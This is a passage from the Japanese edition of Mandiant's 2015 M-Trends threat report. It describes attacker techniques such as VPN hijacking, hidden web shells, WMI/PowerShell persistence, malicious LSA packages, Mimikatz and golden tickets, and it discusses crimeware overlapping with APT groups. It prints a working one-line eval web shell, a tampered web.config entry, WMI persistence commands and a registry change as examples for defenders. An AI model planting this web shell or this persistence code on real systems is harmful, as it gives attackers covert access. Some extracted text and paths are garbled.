VPNセッションを乗っ取り、認証情報なしでネット ワークへのアクセスに成功していたのです。さらに 続く数週間においても、Heartbleedを利用して 標的のVPNインフラストラクチャにアクセスする 別の攻撃が複数、確認されています。
  16. 16. M-Trends セキュリティ最前線からの視点 14 www.mandiant.com ネットワーク内部への 侵入 足がかりの 確立 権限の 昇格 内部の 偵察 目的 達成 ネットワーク内の 移動 アクセスの 維持 VPNの乗っ取り 標的のVPNへのアクセスに成功した 攻撃事例が、かつてないほど多く確認 されました。 不正なセキュリティ・パッケージ 攻撃者は、Windowsのセキュリティ・ パッケージの拡張機能を使用して、 バックドアやキーロガーを仕掛けて いました。 Webシェルの隠 攻撃者は2014年も、Webベースのマルウェアを仕掛け て隠 する新たな手法を編み出してきました。Mandiant では、次のような複数の手法を確認しています。 • SSL暗号化を使用するサーバーにシェルを仕掛け、 監視の網をかいくぐる • わずか1行で構成される「eval」シェルを正規のWeb ページに埋め込む • サーバーの構成ファイルを改ざんして不正なDLLを 読み込ませる WMIとPowerShellの悪用 アクセスの維持、データの収集、ネット ワーク内の移動のために、Windows標 準の強力なコンポーネントであるWMI とPowerShellを悪用する攻撃が増加し ていました。 Kerberosを使用した攻撃 攻撃者は、ドメイン管理者の権限を取得した後、 Kerberosの「ゴールデン・チケット」を利用して、 任意の特権アカウントとして認証を受けていま した。この攻撃は、ドメインのパスワードがリセット された後でも有効に機能します。 プレーンテキストのパスワード 攻撃者は、Mimikatzユーティリティの再 コンパイル版を使用することで、アンチ ウイルスによる検知を免れながら、メモリ からプレーンテキストのパスワードを盗み 出していました。 防御側が進化すれば、攻撃側もそれ に適応してさらなる革新を遂げます。 2014年、Mandiantは攻撃ライフサイ クルの各段階で新たな手口をいくつか 確認しました。その代表例を次に示し ます。 図4:Mandiantの調査で確認された新たな攻撃手法 いずれのケースについても、攻撃を発見する手が かりとなったのはVPNログでした。正規のユー ザー・セッションのソースIPアドレスは、攻撃者 に乗っ取られた途端、攻撃元の地域のIPアドレス 管理団体が発行するアドレス・ブロックに切り替わ ります。このIPアドレスの変化が乗っ取りを見つ け出す糸口になりました。 マルウェアの隠 と偽装 マルウェアを巡っては、攻撃側と防御側の間で 以前から隠 と検知の激しい攻防が繰り広げら れており、その傾向は2014年に入っても変わって いません。攻撃活動を偽装し、システムに感染さ せたマルウェアを隠 するための新しい手口が いくつか確認されています。 Webシェルの隠 WebベースのバックドアやWebシェルは、すでに 10年ほど前から存在しているマルウェアの一種 です。ネットワーク型/ホスト型のアンチウイルス・ ソリューションによる検知を免れる新しい偽装 手法が次々と登場しており、現在でも標的型攻撃 において広く使用されています。 Mandiantでは、Secure-SocketLayer(SSL) 暗号化を利用するサーバーにWebシェルを仕掛 けるという巧妙な手法が使われていた事実を複数 の攻撃事例で確認しています。この場合、バック ドアが送受信するすべてのリクエストは、サーバー が保持する正規の秘密 で暗号化されるため、 セキュリティ・ソリューションでSSLトラフィックを 検査できるよう構成していない環境では、攻撃者 による不正な活動は検知できないことになります。 最近では、公開WebサービスにSSL暗号化を適用 するケースが増えていることもあり、この攻撃手法 は今後さらに普及するものと予想されます。 攻撃の隠 手法としては、正規のWebページに 「eval」シェルを埋め込むという方法も使用され ています。evalシェルとは、HTTPリクエストの パラメータとして送信されたコードを実行するため の小さなバックドア・スクリプトを指します。eval シェルは数十バイト程度のサイズであるため、 HTMLファイルの中に容易に紛れ込ませること ができます。
  17. 17. www.mandiant.com 15 evalシェルが埋め込まれたWebページは、通常 のHTTPリクエストに対しては通常どおり描画さ れます。しかし攻撃者が特定のパラメータ付きで そのページをリクエストすると、送信された不正な コードがeval文によって解析され、実行されます。 Webページに埋め込み可能なevalシェルの全体を 図5に示します。攻撃者のWebシェル・クライ アントは、リクエスト・パラメータのp1に不正な コードを埋め込みます。 Webベースのマルウェアの中でも特に巧妙なのが、 最後に紹介する次のマルウェアです。攻撃者はまず、 Microsoft Internet Information Services(IIS) によるWebサーバーの構成ファイル(web.config) を改ざんし、不正なHTTPモジュールがWebサー バーに読み込まれるようにします。web.config の改ざん例(一部を編集した抜粋)を図6に示し ます。 この改ざんにより、サーバーは共有モジュール・ ディレクトリからBadModule.dllを読み込み、以降 に受信するすべてのWebリクエストの処理に このモジュールを使用するようになります。 BadModule.dllは、ユーザーの認証情報を含め、 サーバーに送信されるWebリクエストの内容を 解析、キャプチャします。図6はあくまで例であり、 実際の構成ファイルに記述されたモジュール名は、 実在するWindowsのDLLを装った名前となってい ます。また攻撃者は検知を免れるため、モジュール・ ファイルと構成ファイルのタイムスタンプも改ざん しています。 WMIを利用したマルウェアの永続化 Windows Management Instrumentation (WMI)は、システム管理のための豊富な機能と インタフェースを提供するWindowsのコア・コン ポーネントです。アプリケーションやスクリプト 言語(PowerShellやVBScriptなど)では、WMI を使用してデータの収集、低レベルのOSコンポー ネントとの相互作用、コマンド実行などの処理を 行います。WMIはイベント・フレームワークとして の機能も備えており、特定オブジェクトの状態の 変化に応じてアプリケーション(攻撃者が使用 する場合はマルウェア)を実行することが可能 です。 検知を回避するための手段としてWMIを使用する 攻撃は、従来からかなり希でした。おそらく、WMI との相互作用は複雑で、検知の回避にはもっと 単純な手法で十分だったためと考えられます。 しかし2014年には、マルウェアを密かに永続化 する手段としてWMIを使用する脅威グループが 少数ながら確認されています。 確認された攻撃では、主にPowerShellを使用して 次の3つのWMIオブジェクトを作成していました。 • イベント・フィルター:マルウェアを永続させ るための仕組みとして機能する、繰り返しの イベント(特定の時刻や起動後の経過時間 など)をポーリングします。 • イベント・コンシューマ:特定のスクリプトや コマンドを実行してイベントを「消費」し ます。多くの攻撃では、任意のコマンドおよび 引数を実行するコマンドライン・イベント・ コンシューマ、VBScriptを実行するActive Scriptイベント・コンシューマが使われていま した。 • フィルターからコンシューマへのバインド: フィルターの作動時に特定のコンシューマが 実行されます。 <%@ Page Language=”Jscript”%><%eval(Request.Item[“p1”],”unsafe”);%> 図5:「eval」Webシェルの例 <!--HTTP Modules --> <modules> <add type=”Microsoft.Exchange.Clients.BadModule” name=”BadModule” /> </modules> 図6:改ざんされたweb.configからの抜粋
  18. 18. M-Trends セキュリティ最前線からの視点 16 www.mandiant.com WMIは、イベント・フィルターのクエリを定期的にポーリングします。次の例では、毎日8時5分に フィルターの条件が満たされます。2 フィルターが作動すると、WMIは自動的に、そのフィルターにバインドさ れたイベント・コンシューマを実行します。次に示したのは、Base64エン コードの不正なコードを引数にしてPowerShellを実行するコマンドラ イン・コンシューマの抜粋です。 3 攻撃者が、PowerShellコマンドを実行して3つのWMIイベント・オブジェクトを作成します。 コマンドまたはスクリプトを実行するコンシューマ、繰り返しのイベントをポーリングする フィルター、そしてフィルターをコンシューマに関連づけるバインドです。 1 WMIのRoot Subscription名前空間 イベント・コンシューマ 「このスクリプトまたは コマンドを実行...」 イベント・フィルター 「繰り返しのイベントを ポーリング...」 フィルターからコンシューマへのバインド 「このフィルターを使用して このコンシューマを実行」 Set-WmiInstance SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_LocalTime' AND TargetInstance.Hour = 08 AND TargetInstance.Minute = 05 GROUP WITHIN 60 CommandLineTemplate="C:WINDOWSSystem32WindowsPowerShellv1.0powershell.exe –NonInteractive –enc SQBuAHYAbwBrAGUALQBDAG8AbQBtAGEAbgBkACAALQBDAG8AbQBwAHUAdABl..." 図7:WMIを使用したマルウェアの永続化の例
  19. 19. www.mandiant.com 17 図8は、WMIのコマンドライン・イベント・コン シューマを作成するPowerShellの構文例です。 ここで作成されたイベント・コンシューマは、 Ba se 6 4エンコードの文字列を引数にして powershell.exeを実行します。この文字列には、 任意のPowerShellコード、たとえば単純なダウン ローダやバックドアのコードを指定できるため、 スクリプト・ファイルをディスク上に用意する必要 がありません。イベント・コンシューマを適切な イベント・フィルターにバインドしておけば、コン シューマを繰り返し実行することも可能です。 攻撃者がマルウェアの永続化にWMIを使用する 目的は、フォレンジック分析の妨害と考えられます。 PowerShellコマンドを使用して、ローカルでも リモートでも実行できるフィルターとコンシューマを 作成できるうえ、永続化を実現するその他の多くの 仕組みと異なり、レジストリに痕跡が残らないか らです。 またディスク上のオブジェクトは複雑なデータ ベース(WMIリポジトリのobjects.data)に格納 されるため、分析が困難です。さらにWindows では、新たに作成された、または作動したフィル ターとコンシューマの監査は、デバッグレベルで のログが無効になっていると実行されません。 デバッグレベルでのログはデフォルトでは無効 状態で、また大量のイベントが記録されるため 長期的な使用には適していません5 。 不正なセキュリティ・パッケージ Windowsローカル・セキュリティ機関(LSA)の セキュリティ・パッケージを使用し、アンチウ イルス・ソリューションによる検知を免れながら、 マルウェアを自動的に読み込む攻撃も何件か確認 されています。これは、マルウェアの永続化にレジ ストリを使用する攻撃としては珍しい手法です。 LSAのセキュリティ・パッケージは一連のDLLで 構成されており、システムの起動時にLSAによって 読み込まれます。各パッケージは、HKLMSYSTEM CurrentControlSetControlLsaというレジス トリ・キーの値で設定され、それぞれの値には、 %SYSTEMROOT%system32ディレクトリ から読み込むファイルの名前(拡張子なし)を参照 する文字列のリストが指定されています。 LSAのパッケージはLSASS.EXEによって自動的に 読み込まれるため、管理者権限を持つ攻撃者は、 エントリを追加、編集して不正なDLLを永続化 できます。Mandiantが2014年に調査を実施した あるセキュリティ・インシデントでは、Security Packagesの値を改ざんして、多段式バックドアの ローダー・コンポーネント(tspkgEx.dll)を永続化 するという手法が使用されていました6 。 改ざん前後の値の変化を図9に示します。 この結果、C:WINDOWSsystem32tspkgEx. dllがシステム起動時にLSASS.EXEによって読み 込まれるようになります Set-WmiInstance -Namespace “rootsubscription” -Class ‘CommandLineEventConsumer’ -Arguments @{ name=’EvilWMI’;CommandLineTemplate=”C:WINDOWSSystem32Windows- PowerShellv1.0powershell.exe –enc SQBuAHYAbwBrAGUALQBDAG8AG8AbQ...<SNIP>”;Run- Interactively=’false’} 図8:WMIのイベント・コンシューマを作成するPowerShellコマンド(抜粋) SECURITY PACKAGES(改ざん前): kerberos msv1_0 schannel wdigest tspkg pku2u SECURITY PACKAGES(改ざん後): kerberos msv1_0 schannel wdigest tspkg pku2u tspkgEx 図9:マルウェアが読み込まれるように、HKLMSYSTEMCurrentControlSetControlLsaSecurity Packagesの値を改ざん 5 Mandiant の年次カンファレンス「MIRcon 2014」では、WMI と PowerShell のそれぞれを利用した攻撃について、手 法の詳細、事例、推奨される検知およびフォレンジック分析のアプローチを解説する講演が行われました。講演で使用さ れたプレゼンテーション・ファイルは、https://dl.mandiant.com/EE/library/MIRcon2014/MIRcon_2014_IR_Track_ There%27s_Something_About_WMI.pdf、https://dl.mandiant.com/EE/library/MIRcon2014/MIRcon_2014_IR_ Track_Investigating_Powershell_Attacks.pdf で(ともに英語)公開されています。 6 ここでは DLL 名を編集しています。
  20. 20. M-Trends セキュリティ最前線からの視点 18 www.mandiant.com 被害を受けた組織のうちMandiantがインシデント・レスポンスを実施したほぼすべてで、アンチ ウイルス・ソフトウェアを導入していたにもかかわらず、Mimikatzの検知に至りませんでした。広く 使用され、知名度も高い同ツールを検知できなかった理由は、多くの攻撃者がソースコードに 改変を加え、再コンパイルしているためです。 LSAは拡張に対応しており、カスタム・セキュリ ティ・パッケージを使用してログオン時にユーザー の認証情報を処理することもできます。不正なセキュ リティ・パッケージでこの機能を悪用すれば、ログ オン・イベント時にパスワードをプレーンテキスト でキャプチャできます。 2014年には、まさにこの目的でマルウェアをセキュ リティ・パッケージとしてLSAに読み込ませる 標的型攻撃が確認されています。また一般に入手 可能なツールキットMimikatz7 にも、読み込み時 にパスワードを盗み出すセキュリティ・サポート・ プロバイダー「mimilib ssp」が用意されています8 。 入手が容易になったパスワード 認証情報を盗み出すツールが広く入手可能となった 結果、Windows環境でのパスワード収集と権限昇格 は従来よりもはるかに容易になりました。2014年 に確認された標的型攻撃では、攻撃者は主に次の 2つの手法を使用しています。 • パスワードの代わりにハッシュを使用する 「Pass-the-hash」により、盗み出したNTLM ハッシュで認証を突破する • Mimikatzを使用して、メモリからプレーンテ キストのパスワードを抽出する Microsoftは、Windows Server 2012 R2と Windows 8.1で対策を強化し、上記の手法による パスワードの窃取をある程度防止できるように しましたが(完全に防止できるようになったわけ ではありません)、Mandiantが2014年にインシ デント・レスポンスを実施した組織のほとんどは、 まだドメインのサーバーにWindows Server 2008、 エンドポイントにWindows 7を使用しています。 Pass-the-hashは、現在でも十分に通用する確立 済みの手法です。特に、複数のシステムでローカル 管理者のパスワードが同じ場合に高い効果を発 揮します。Mimikatzはさらに一歩踏み込み、オペ レーティング・システムがシングル・サインオン 用にメモリに保持しているプレーンテキストの Windowsパスワードを抽出します。 社員用のワークステーションが攻撃を受けた場合、 漏えいする情報はその社員のドメイン・アカウント のパスワードだけで済みます。一方、リモート・デスク トップ・プロトコル(RDP)やPsExecユーティリ ティ経由での対話型ログオン・セッションが頻繁 に発生する共有サーバーが狙われた場合、漏え いするパスワードは膨大な数に上る恐れがあり ます。最初に少数のシステムが攻撃を受けた 場合でも、そこを起点として瞬く間に、Active Directoryドメイン全体に被害が広がる可能性 があります。 被害を受けた組織のうちMandiantがインシ デント・レスポンスを実施したほぼすべてで、アンチ ウイルス・ソフトウェアを導入していたにも関わ らず、Mimikatzの検知には至りませんでした。広く 使用され、知名度も高い同ツールを認識できな かった理由は、多くの攻撃者がソースコードに 改変を加え、再コンパイルしているためです。また 一部の攻撃者は、メモリ内だけで動作する PowerShellスクリプト「Invoke-Mimikatz」など の亜種を使用しています。 2014年には、最近のWindowsドメインにおける デフォルトの認証メカニズムであるKerberosを 狙った新たな攻撃手法も複数確認されています。 中でも特に危険性が高いのが、Mimikatzの「ゴール デン・チケット」を使用した攻撃です。ドメイン・ コントローラを乗っ取った攻撃者は、この手法を 用いてあらゆるユーザーのチケット保証チケット を生成できます。 7 https://github.com/gentilkiwi/mimikatz5 8 Matt Graeber は MIRCon 2014 カンファレンスで、不正なセキュリティ・パッケージの詳細とそれらを検知して使用を制限 する仕組みについて講演を行っています。講演で使用されたプレゼンテーション・ファイルは、https://dl.mandiant.com/ EE/library/MIRcon2014/MIRcon_2014_IR_Track_Analysis_of_Malicious_SSP.pdf(英語)で公開されています。
  21. 21. www.mandiant.com 19 ゴールデン・チケットの最大の特徴は、オフラインで 生成できるうえ有効期限もなく、あらゆるアカウント になりすますことができる点です。パスワードの リセットも効果はありません。また侵入先の環境 が再構築されても、再度侵害して、すぐさまドメ インの管理者権限を取得することが可能です。 事後での対応になってしまいますが、この攻撃に 対処するには、Kerberosの 配布サービスの アカウントkrbtgtのパスワードを2回連続でリセットす る以外に方法はありません。その後はアカウントの パスワード履歴が消去され、発行済みのすべて のKerberosチケットが無効となります。 WMIとPowerShellを使用してネット ワーク内を移動 Windows環境に対する従来の攻撃で、ネットワーク 内の移動やコマンド実行の場合には、Windowsの 標準ユーティリティ(netやatなど)、カスタム・ マルウェア、バッチ・ファイル、Visual Basic(VB) スクリプト、標準的な管理ツール(PsExecなど) の使用が一般的でした。どのツールも十分な信頼 性を備え、使い勝手にも優れていますが、攻撃者 の立場からすると、攻撃の痕跡や証拠を残して しまうという欠点を抱えています。 その後、2013年から2014年にかけて、一部の APT攻撃(Advanced Persistent Threat:高度 で持続的な標的型攻撃)グループが使用する手法 に明らかな変化が見て取れるようになりました。 Windows環境のネットワーク内での移動や認証 情報の収集、役に立つ情報の検索に、WMIと PowerShellを使用するケースが増えてきたのです。 同様に、セキュリティ研究者やペネトレーション・ テストを実施する技術者の間でも、PowerShellを 取り入れる動きがここ数年広まっています。その 結果、攻撃側と防御側のどちらにとっても、スキル の向上に役立つ情報やソースコードが広く流通 するようになりました。 前述したように、攻撃者はマルウェアを永続化して 侵入先ネットワークへのアクセスを維持するために WMIイベントを使用していますが、加えてWMIの 機能をシェルやスクリプトに拡張するコマンド ライン・ツールwmic.exeも使用しています 。 攻撃者は、リモート・システムへの接続、レジストリ の改変、イベント・ログへのアクセス、そしてコマンド 実行などの処理にWMIを利用しています。通常、 リモートからのWMIコマンドは、最初のログオン・ イベントを除き、アクセス先のシステムに侵入の 痕跡をほとんど残しません。 Mandiantが2014年に対応した複数のインシデント において、攻撃者はネットワーク内での移動や認証 情報の収集に、PowerShellのリモート・コマンド とメモリ内で実行可能なスクリプトを使用していま した。PowerShellのコードは、アクセス先システム のディスクに一切データを残さずにメモリ内で実行 できるため、攻撃の痕跡を最小限に留めること ができます。また多くの環境に標準でインストール されている古いバージョンのPowerShellは、実行 されたコードの詳細なログを記録しません。 要点:高度な脅威グループは、ツールや手口を継続的に進化させるアプローチで、システ ムに残される活動の痕跡を抑え、検知を回避しようと目論んでいます。防御側の組織は、エ ンドポイント・システム、ログ・リソース、各種ネットワーク・デバイスに対し、リアルタイムの 監視と 及的なフォレンジック分析の両方を実施できるように手を打つ必要があります。攻 撃者の一歩先を行くためには、平時のネットワーク・アクティビティのベースラインを把握し たうえで、そのベースラインから逸脱しているアクティビティを予防措置的に追跡する対策 が重要となります。
  22. 22. M-Trends セキュリティ最前線からの視点 20 www.mandiant.com 傾向4: あいまいになる境界線 - 互いの手口を 模倣するサイバー犯罪者とAPT攻撃者 Mandiantが2014年に実施したインシデント・レスポンス事例からは、もう1つの新たな傾向が 見て取れます。サイバー犯罪者がAPT攻撃者の手口を模倣するのと同時に、サイバー犯罪者の 間で広く使用されているツールをAPT攻撃者が導入し始めているのです。このように両者の 攻撃手法が同化していく中で、インシデントの影響範囲を把握し、リスクを踏まえた適切な セキュリティ戦略を策定するには、攻撃の目的を見極める取り組みが重要となります。 M andiantは2014年を通じて、ロシアの 脅威グループが関与しているサイバー 攻撃の調査を実施してきました。いず れの攻撃にも、実行者は犯罪グループまたは 国家組織のどちらなのか、判別が難しいという 特徴があります。このようにツールや手法による 攻撃者の判別が難しい場合に、インシデントの 影響範囲を把握するためには、攻撃者の意図の 分析が欠かせません。 Mandiantが確認した、金銭的利益を目的とする いくつかの標的型攻撃グループは、純粋なサイ バー犯罪というよりもむしろ、国家レベルのAPT 攻撃を思わせる痕跡を残していました。2014年 に確認された、APT攻撃グループとサイバー 犯罪グループが使用する手口の共通点をP.21の 一覧に示します。 攻撃の意図を見極める重要性 APT攻撃グループとサイバー犯罪グループの 手口が重なりを見せる中で、サイバー攻撃の調査 担当者や分析担当者には、先入観に左右されない 意識が求められます。1つの手口やツールを個別 に評価するだけでは、攻撃者の意図は把握でき ません。2014年に発生したロシアを舞台とする サイバー攻撃事例は、攻撃の技術的な特徴を解釈 する際に、攻撃者の最終的な目的を分析する 重要性と課題を示しています。 2014年10月、Mandiantはロシア政府のために 政治的、軍事的な機密情報を収集していたと思 われる脅威グループ「APT28」の活動をまとめた レポートを発表しました。同グループは数年にわ たり、防衛関連企業や政府機関、軍隊、政府間 組織を標的に活動を展開していました。 またMandiant以外の研究者チームも、APT28 と同様、ロシア政府のためにスパイ活動を行って いたと見られる、ロシアの別の脅威グループの 存在を明らかにしています。このグループは、 「Sandworm Team」9 、「Quedagh」10 、「BE2 APT」11 などの名称で呼ばれています。 9 Cyber Espionage Operators Sandworm Team Leverage CVE-2014-4114 Zero-Day. iSight Partners. 14 Oct. 2014. Web. 2 Dec. 2014.; 10 https://www.f-secure.com/documents/996508/1030745/blackenergy_whitepaper.pdf 11 https://securelist.com/blog/research/67353/be2-custom-plugins-router-abuse-and-target-profiles/
  23. 23. www.mandiant.com 21 手口 サイバー犯罪グループとAPT攻撃グループによる使用例 ソーシャル・ エンジニアリング ソーシャル・エンジニアリングはAPT攻撃グループの専売特許ではありません。2014年には、金銭的 利益を目的とする脅威グループによるスピア・フィッシング・メールの使用事例が確認されています。 このグループは、最初に標的をマルウェアに感染させる手段、およびマルウェア駆除後に再度感染 させるための手段としてスピア・フィッシング・メールを使用していました。 対話型のソーシャル・エンジニアリングも、サイバー犯罪グループとAPT攻撃グループの両者に共通 する手口です。ある事例では、金銭的利益を目的とする攻撃者が人気のソーシャル・メディアにアカ ウントを作成して標的企業の社員に近づき、バックドアをダウンロードさせようと誘導しました。一方、 国家レベルのAPT攻撃グループと思われる「APT3」も、ある女性を装ったソーシャル・メディア・ アカウントを利用して、ある企業の社員と3週間にわたりメッセージのやりとりを続けた後、バックドア を仕掛けた「履歴書」をその社員のメール・アドレスに送信。さらに別の社員にも、IT管理者の氏名 や使用しているソフトウェアのバージョンなど、社内状況を探るようなメッセージを送っていま した。 独自開発のマルウェア およびツール 金銭的利益を目的とするサイバー犯罪グループとAPT攻撃グループのどちらも、独自のツールを開発 している事実が確認されています。たとえばあるサイバー犯罪グループは、標的のネットワークに数年 間潜伏して活動しながら、60種類を超えるマルウェアやツールを開発し、攻撃に利用していました。 またロシアのAPT攻撃グループであるAPT28は、7年以上にわたってマルウェアを体系的に進化 させ、侵入先ネットワークへの長期滞在を可能にするマルウェア・プラットフォームを作り上げてい ました。 クライムウェア クライムウェアとは、主に犯罪の遂行を目的とする、一般に入手可能なツールキットや有償販売され ているツールキットを指します。ただし、金銭的利益を目的するサイバー犯罪者だけが使用するとは 限りません。たとえば活動拠点がロシアと考えられるあるAPT攻撃グループは、ゼロデイ・エクスプ ロイトを利用して、サイバー犯罪者の定番ツールキット「BlackEnergy」をインストールしていま した。またリモート・アクセス・ツールは、APT攻撃グループとサイバー犯罪グループのどちらにも 重用されています12 。以上の事実が示すように、使用ツールだけでは攻撃者のタイプを正確に判断 できません。 アクセスの維持/ マルウェアの永続化 金銭的利益を目的とするサイバー犯罪は、必ずしも力づくで実行されるわけではありません。目的を 達成するまで、長期にわたりネットワークに滞在するのはAPT攻撃グループの特徴ですが、金銭的 利益を目的とするサイバー犯罪グループも、同様の潜伏能力を備えつつあります。たとえばある事例 では、サイバー犯罪グループがWindowsのよく知られたスタートアップ・レジストリを使用するという 方法で、システムの起動時に密かにマルウェアを実行していました。また、5年以上にわたって同じ 侵入先ネットワークへのアクセスを維持していた事例、ひとたびネットワークから排除された後も繰り 返しアクセスしていた事例も確認されています。 盗み出すデータの種類 データ窃盗は幅広い種類のデータを対象に、大規模データセットに対して行われています。中でも 以前から標的とされているのが、個人の特定につながる情報(PII)が大量に保存されたデータ・ リポジトリです。PIIを狙うのは本来、詐欺行為での利用や闇市場での転売による金銭的利益を目的と する脅威グループでしたが、最近ではAPT攻撃グループなど、金銭的利益とは無関係な目的でも PIIに目を付けるようになっています。たとえば、APT18などのAPT攻撃グループがPIIの窃盗に関与 している事実が確認されています13 。 図10:サイバー犯罪グループとAPT攻撃グループに共通する手口 12 https://www.fireeye.com/blog/threat-research/2014/04/crimeware-or-apt-malwares-fifty-shades-of-grey.html 13 APT18 は中国に拠点を置く脅威グループです。詳細については、https://www2.fireeye.com/WBNR-14Q3HealthcareWebinar.html( 英語 ) を参照してく ださい。
  24. 24. M-Trends セキュリティ最前線からの視点 22 www.mandiant.com Sandworm Teamなどが攻撃対象としていた組織 はAPT28と似通っていますが、両グループには 大きな相違点もあります。たとえば前者は、ゼロ デイ・エクスプロイトや犯罪ツールを使用しており、 米国の重要インフラを攻撃していた可能性があ ります14, 15 。 この攻撃で使用されていたマルウェアとインフラ ストラクチャを分析したところ、同グループは BlackEnergyツールキット16 を使用して、ロシア との緊張関係が続くウクライナの組織を標的とし ている事実が判明しました。またこのグループは、 同じくBlackEnergyを使って、産業プロセスや 重要インフラの制御装置として広く利用されてい るSCADA(Supervisory Control And Data Acquisition)システムを攻撃したともいわれて います17 。 この攻撃で狙われたのは、メーカーの試作品でも、 金銭的価値のある機密情報や知的財産を保存、 転送するネットワークでもなく、さまざまな産業 で使用されている製造装置です。この事実から 攻撃者は、標的システムの弱点を探るため入念 な偵察活動を行っていた可能性があると考えら れます。このような活動でクライムウェア・ツール キットBlackEnergyを使用するメリットは、身元 の発覚を防ぎ、いざというときに犯行を否認でき るという点です。 両グループの区別の重要性 攻撃者の目的や素性の把握が重要であるかどう かという点については、セキュリティ研究者の間 でも意見が分かれています。代表的な否定的な 意見として、「ネットワーク防御の観点からは、 誰がシステムに侵入したかは問題ではない。攻撃 を防御し、マルウェアを駆除できればそれでよい」 という見方があります。 サイバー犯罪グループとAPT攻撃グループの使用 ツールや手口がますます似通ってきた現状は、 攻撃者の意図や被害範囲の特定を一層難しくし ています。その背景には、攻撃者の巧みな策略は もちろん、不十分な法整備、政府関係者と犯罪者 の共犯関係など複雑な問題が絡んでいます。 一方、このような不透明な状況下で、攻撃者の意図や 目的の把握は、適切な対応方法の判断に役立ち ます。たとえば、ある国家政府のために情報を収集 しているロシアの脅威グループは、米国の重要 インフラ・システムへのリモート・アクセスにクライ ムウェアを使用しています。一般に入手可能な クライムウェアを使用しているからといってこの 攻撃をありがちなサイバー犯罪と見なせば、対応 を誤る結果を招きかねません。 ネットワークに侵入したマルウェアへの対処方法は、 単純な迷惑行為で偶然感染したマルウェアなの か、国家レベルのサイバー攻撃が招いた結果な のかによって大きく変わります。同様に個人情報 が盗み出された場合も、単なるサイバー犯罪者、 または国家レベルの攻撃者の違いによって対応 を変える必要があります。前者は後者に比べてより 直接的な影響を及ぼす可能性があるため、区別 して対応する必要があります。 要点:サイバー犯罪グループとAPT攻撃グループが同じようなツールや手口、手順を使用 するようになった現在、攻撃者の意図や目的を綿密に分析する取り組みが非常に重要視さ れています。分析の結果によってはじめて、セキュリティ・インシデントの影響範囲を評価し 適切に対応する、また自社が直面している脅威への効果的なセキュリティ戦略の策定が 可能となります。 14 http://blog.trendmicro.com/trendlabs-security-intelligence/sandworm-to-blacken-the-scada-connection/ 15 https://www.virusbtn.com/conference/vb2014/abstracts/LM3-LipovskyCherepanov.xml 16 BlackEnergy は、ダイナミック・リンク・ライブラリ(DLL)を使用して新機能を追加できる拡張可能なフレームワークを備 えています。DLL プラグインは機能単位で作成し、暗号化ファイルに格納することが可能です。表面上、BlackEnergy はど れも同じツールと見せかけているため、攻撃者の最終的な目的の見極めは容易ではありません。サイバー犯罪者の間で広く普及し ており、特に分散サービス妨害(DDoS)攻撃に利用されています(詳細については、http://atlas-public.ec2.arbor.net/ docs/BlackEnergy+DDoS+Bot+Analysis.pdf、http://blogs.mcafee.com/business/security-connected/evolving- ddos-botnets-1-blackenergy を参照してください。ともに英語)。 17 http://blog.trendmicro.com/trendlabs-security-intelligence/sandworm-to-blacken-the-scada-connection/
  25. 25. www.mandiant.com 23 結論 攻撃者は常に進化しています。標的となる組織の業種は拡大の一途を り、攻撃手法も変化を 続けています。しかし、攻防の様相には従来とほとんど違いが見られません。避けられない セキュリティ侵害に対し、あまりにも多くの組織が無防備な姿をさらし、ネットワークへの侵入 に成功した攻撃者に対して、あまりにも長い活動期間を与えているのです。 サ イバー・セキュリティが社会で問題視 される中、組織に求められているのは データ侵害に対する認識を変えるこ とです。恐怖や屈辱をもたらす対象と捉えるので はなく、現実のビジネス上の課題と見なして必要 な対策を講じる必要があります。セキュリティ・ インシデントは確実に起きるものと考え、自信を 持って対処できるよう準備を整えておかなけれ ばなりません。 その根拠となるのが、サイバー・セキュリティに 対する新しいアプローチです。すべてのセキュリ ティ侵害を完全に防ぐことは不可能です。しかし、 最新の高度なセキュリティ脅威を素早く確実に 防御、検知、分析し、対応を誤らなければ、メディア の見出しを飾るような最悪の事態から自社、顧客、 取引先を守ることができます。 セキュリティに万全はあり得ません。鉄壁の防御も、 想定外の手法によってたやすく崩されてしまいます。 2014年を通しての傾向ですが、脅威グループは 新たなセキュリティ対策で妨害された場合でも、 容易に引き下がりません。 それでも、テクノロジー、インテリジェンス(脅威 情報)、専門知識を正しく組み合わせれば、この セキュリティ・ギャップを小さくすることが可能 です。新たな脅威、ツール、巧妙な侵入手法に 適応し、攻撃者の一歩先を行くセキュリティ対策 を実現できます。 巧妙さと強力な武器、強い動機をあわせ持つ 攻撃者は、確かに厄介な存在です。しかし私た ちも正面から脅威に立ち向かえば、攻撃を押さ え込むことができるはずです。
  26. 26. M-Trends セキュリティ最前線からの視点 24 www.mandiant.com Mandiantについて FireEyeグループのMandiantは、ほぼすべての主要業種の数百に及ぶクライアントを対象に、コン ピュータ・ネットワークや端末からセキュリティの脅威を一掃するソリューションを提供しています。当社の ソリューションはあらゆる種類の重大なセキュリティ・インシデントに対応しており、Fortune 500企業や 政府機関から高い信頼を得ています。セキュリティ・インシデントの発生時には、Mandiantのセキュリ ティ・コンサルタントが、FireEyeの脅威情報とテクノロジーを駆使してインシデント・レスポンスを 実施し、被害からの復旧を支援します。 FireEyeについて FireEyeRは、次世代のサイバー攻撃から、世界中の民間企業や官公庁をリアルタイムで防御するため に専用設計された、仮想マシンベースのセキュリティ・プラットフォームを発明した企業です。高度な サイバー攻撃は、次世代ファイアウォールやIPS、アンチウイルス、各種ゲートウェイなど、シグネチャ ベースのセキュリティ対策を容易にすり抜けてしまいます。FireEyeR脅威対策プラットフォームは、攻撃 ライフサイクル全体で、モバイル、Web、電子メール、ファイル・システムといった主要な攻撃経路にわ たり、シグネチャを利用しないリアルタイムでダイナミックな脅威防御策を組織へ提供します。FireEye プラットフォームの核となる仮想実行エンジンは、Dynamic Threat Intelligence(DTI)によって補完 されており、サイバー攻撃をリアルタイムに検出・防御することができます。FireEyeのソリューションは、 世界67か国以上の2,700を超える組織に導入されており、Fortune 500企業の157社以上で利用され ています。
  27. 27. A FireEye® Company ファイア・アイ株式会社 | 〒101-0054 東京都千代田区神田錦町1-1 神田橋安田ビル6階 | TEL: 03-4577-4401 | japan@fireeye.com | www.FireEye.co.jp FireEye, Inc. | 1440 McCarthy Blvd. Milpitas, CA 95035 | +1 408 321 6300 | www.FireEye.com © 2015 FireEye, Inc. All rights reserved. MandiantとMロゴは、FireEye, Inc.の登録商標です。 その他すべてのブランド名、製品、またはサービス名は、それぞれの所有者の商標またはサービスマーク として登録されている可能性があります。– RPT.MTRENDS.JA.022415

×